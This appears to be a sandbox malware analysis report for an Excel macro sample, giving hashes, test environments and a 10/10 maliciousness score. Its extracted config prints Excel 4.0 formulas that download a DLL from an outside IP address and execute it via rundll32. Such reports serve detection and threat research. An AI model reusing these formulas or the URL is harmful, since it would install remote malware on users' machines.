General
- Target: 021412d6c7f5d8357ca18623ab41d2c4_JaffaCakes118
- Size: 101KB
- Sample: 240427-bmrwjagg5z
- MD5: 021412d6c7f5d8357ca18623ab41d2c4
- SHA1: 59807e7fa0de3d3d39db6c154ee3a94c63ffea5f
- SHA256: e1fbc397fd27ff212644a632aef8a3ca1debbd7c0327b461fa9e964351a7f421
- SHA512: 84515748131e55e8bb8442d5fa728f2db3961ac0d8eb23055dbe8ea5b94f56a23ac35a34dd939e134c39161d356956d4d883e0bc6aa9741693f868604db38398
- SSDEEP: 3072:JQxEtjPOtioVjDGUU1qfDlaGGx+cL2QnABtQ/XsfEABhnz2JNpfPNGN71:6xEtjPOtioVjDGUU1qfDlavx+W2QnAmI
Behavioral task: behavioral1
- Sample: 021412d6c7f5d8357ca18623ab41d2c4_JaffaCakes118.xls
- Resource: win7-20240221-en
Behavioral task: behavioral2
- Sample: 021412d6c7f5d8357ca18623ab41d2c4_JaffaCakes118.xls
- Resource: win10v2004-20240419-en
Malware Config
Extracted
- URL: http://209.141.54.161/crypt.dll
- formulas:
=CALL("Kernel32","CreateDirectoryA","JCJ","C:\rncwner",0)
=CALL("Kernel32","CreateDirectoryA","JCJ","C:\rncwner\CkkYKlI",0)
=CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://209.141.54.161/crypt.dll","C:\rncwner\CkkYKlI\UiQhTXx.dll",0,0)
=CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","rundll32.exe","C:\rncwner\CkkYKlI\UiQhTXx.dll DllRegisterServer",0,0)
=HALT()
Targets
- Target: 021412d6c7f5d8357ca18623ab41d2c4_JaffaCakes118
- Score: 10/10
- Process spawned unexpected child process: This typically indicates the parent process was compromised via an exploit or macro.